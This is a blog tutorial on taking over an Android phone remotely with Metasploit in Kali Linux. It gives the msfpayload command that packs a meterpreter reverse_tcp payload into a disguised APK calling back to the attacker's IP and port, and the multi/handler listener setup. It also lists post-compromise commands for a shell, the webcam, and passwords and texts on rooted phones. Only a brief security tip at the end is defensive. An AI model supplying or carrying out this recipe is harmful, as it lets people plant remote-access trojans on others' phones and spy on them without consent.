Hack Android phone remotely using Kali Linux.

SHARE:

This is a tutorial explaining how to remotely hack android device using Metasploit in Kali Linux. Metasploit is one of best security tools. And the best thing to know is that Metasploit has added some functionality for security testing Android Devices.
In this post we will discuss how to get a remote shell on an Android by using Metasploit in Kali Linux. We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.




First of all you need to find your public/external ip and port forwarding
Also read how to schedule any script to run automatically on any event such as login or at a certain time in windows.

Creating a booby trapped APK file 

Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.
1. In Kali Linux, open a terminal prompt and type:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16LPORT=4444 R >app.apk
(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for the LPORT address.)
The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it. Once this is run, a file called “app.apk” will be created:
2. Now just send this file to your Android device, I used a Smart Phone in this instance.




3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!
Now when that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.
4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
5. Once Metasploit starts, type in the following to create a listener:
user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444
Then just type exploit to start the handler:
6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.
7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created. Now on your Metaploit system you should see this:
An active session is created and it drops you automatically into a meterpreter prompt.
8. From here your can type “sysinfo” to get information on the device:
9. You can see the processes running by typing, “ps”:
You are done!
Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and
cd. The Download directory usually has interesting things in it. Though it may error out, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.
Typing “help” at a meterpreter prompt will list all the command that are available. We can also run the shell command that will drop us into a direct Terminal shell if we want:
meterpreter > shell
Process 1 created.
Channel 1 created.
lf the Android phone being attacked is rooted, you can even access the stored passwords, texts or phone logs.
But if the phone is not rooted, one will not be able to access them… Remotely…
This can be noted as a con of rooted phone!




And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from
a major vendor? It had no problems with letting my remote shell run.
Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.
One method to avoid such condition is to update your Google play store and install apps from there only but one can't get all apps specially one used by rooted phones for somewhat unethical purpose. So the ultimate method is to monitor the permissions required by the apps while installation.

About Rishabh Ryber

A cyber explorer and enthusiast who is working with computers since he was six. He appears with tricks related to internet, android, Windows, and iOS as well.

Follow him @ Google Plus | Facebook | Twitter

COMMENTS

BLOGGER: 1
Loading...
Name

3d,1,4G net,1,Accessibility,5,Ads,1,Aircel,1,Airtel,3,Andriod tricks,9,Android,52,Android hacking,4,Android hacks,7,Android tips,3,Android trick,3,android tricks,7,Apple,2,audio tricks,1,BitTorrent,1,block adds in non rooted android phone,1,Blogging,1,Bluestacks trick,1,bootable Pendrive,1,Booting Linux,1,Bsnl tricks,1,BusyBox,1,bypass age verification on YouTube,1,C++tricks,1,caller tune,1,Camera,1,Change Your Name in Windows,1,chrome tricks,4,Cloud tricks,1,Command prompt,6,command prompt tricks,10,Cool Facebook Tricks,3,Cool Google hangouts Tricks,1,Cracked softwares,2,create new scheduled task in windows,1,Creators Update,1,Creators' Update,1,Customization,2,CyanogenMod,1,damaged screen,1,delete dial up connections in windows,1,Detecting keyloggers?,1,difference between WiFi and LiFi.,1,Disable JavaScript in Google chrome,1,disable snap options,1,Disable Windows Update's Automatic Restart,1,diskpart,1,Download Facebook Videos offline,1,drive,1,Editing zone,2,email tricks,1,Facebook,7,Facebook profile to page conversion,1,Facebook tricks,4,FB Tricks,3,firefox,1,free,1,Free Call,1,free net,4,Free recharge,1,free sms,1,Freecharge,1,game cracking,3,gaming,12,Get YouTube Red features on your iPhone,1,get YouTube red for free,1,gmail,2,Google,4,Google Account,2,google accounts,1,Google analytics tricks,1,Google maps,1,Google Now,1,google tricks,3,hack android remotely using Kali Linux,1,hacking,10,hacking tricks,2,Hacking using keyloggers,1,how to,1,How To Block Snip.to From Your Google Analytics Data,1,How to check for hacked wifi,1,How to download Facebook videos,1,How to enable full screen start in windows 10,1,How to find windows 10 version details,1,How to install android device drivers for any phone,1,How to Receive files in Dropbox from a non-Dropbox users with a URL?,1,How to root Android,1,how to take screenshots,1,How to Turn On or Off Automatic Device Driver Installation in Windows 10,2,Instagram tricks,2,Install device drivers of android phones.,1,internet,27,Internet Explorer,2,internet explorer tricks,1,internet tricks,11,iOS,6,iPad,2,iPhone,10,iPhone tricks,2,iTunes,1,Jio,4,JIO offers,1,Jio Phone,1,JIO Tricks,1,JIOPHONE,1,keyboard,1,Keyboard Shortcut,3,keyboard trick,1,Keyloggers,1,keyloggers complete guide,1,laptops,4,lenovo,1,LG G5,1,LiFi,1,Mac,1,Mac address spoofing,1,memory card,1,Messanger,1,movies,1,MS Word,2,Music,1,Notepad,1,Notepad tricks,1,ola trick,1,Pc,3,pc tricks,12,Play Music,1,PlayStore,8,Pokeman Go,1,Power iSO,1,Privacy,12,programming tricks,1,Protect wifi from being hacked,1,recover deleted files using Recuva,1,Recover permanently deleted files,1,Registery tweaks,6,Reliance,1,Rishabh Ryber,8,rooted,8,Rooting Android without PC,1,Rybersoft,11,Samsung,2,Scheduled tasks in windows,1,screen casting,1,screen recording,1,Security,1,setup keyloggers,1,Sharind files,1,Smart lock in lollipop,1,Smartphone,1,smartphone tweaks,1,social media,2,Special,15,Speed up Google chrome,2,Spying Whatsapp,1,Steps to find windows 10 build number and other details,1,tablets,1,tech guide,1,tech news,1,Telegram,4,tips,1,Torrent,4,trick,1,Tricks,3,Two Tweaks To Boost Up Google Chrome in Android,1,Universal Id And Password Of Alan Walker Website w41k3r.com,1,Unlimited call,1,usb tricks,4,Use face lock in android phone,1,use whatsapp on normal phone,1,Useful Registry tweaks by Rybersoft,1,uTorrent,2,vlc,1,VLC TRICKS,5,VPN,1,Watch age restricted videos,1,web,1,webbrowser,5,what is keylogger?,1,what is LiFi,1,whatsapp,8,Whatsapp hack,1,whatsapp tricks,2,Whatsapp Tricks.,2,Wi-Fi,4,WiFi tricks,5,windows,28,Windows 10,12,windows 10 snap disabling,1,Windows 10 tricks,9,Windows hacking,4,Windows Hacks,6,windows tricks,48,Windows Update,1,Xbox,1,Xiaomi,1,Xposed Framework,7,YouTube,2,YouTube tricks,5,
ltr
item
RyberSoft: Hack Android phone remotely using Kali Linux.
Hack Android phone remotely using Kali Linux.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhaed-pe_y09whZ_45CkzkKcEW2xAngnO1HlyDcpgTKE3acZSNmnITMaQOsvlqgAvrxVPUIIi4QYb-mJQR-8BIWV_8im6e1-4K-Vf5OSkIBrZKWKGnK8_iqGbuugr-p8kmpcr4DTqseg/s320/PicsArt_02-13-12.35.44.jpg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhaed-pe_y09whZ_45CkzkKcEW2xAngnO1HlyDcpgTKE3acZSNmnITMaQOsvlqgAvrxVPUIIi4QYb-mJQR-8BIWV_8im6e1-4K-Vf5OSkIBrZKWKGnK8_iqGbuugr-p8kmpcr4DTqseg/s72-c/PicsArt_02-13-12.35.44.jpg
RyberSoft
https://www.rybersoft.com/2016/02/this-is-tutorial-explaining-how-to13.html
https://www.rybersoft.com/
https://www.rybersoft.com/
https://www.rybersoft.com/2016/02/this-is-tutorial-explaining-how-to13.html
true
1459016836896156319
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy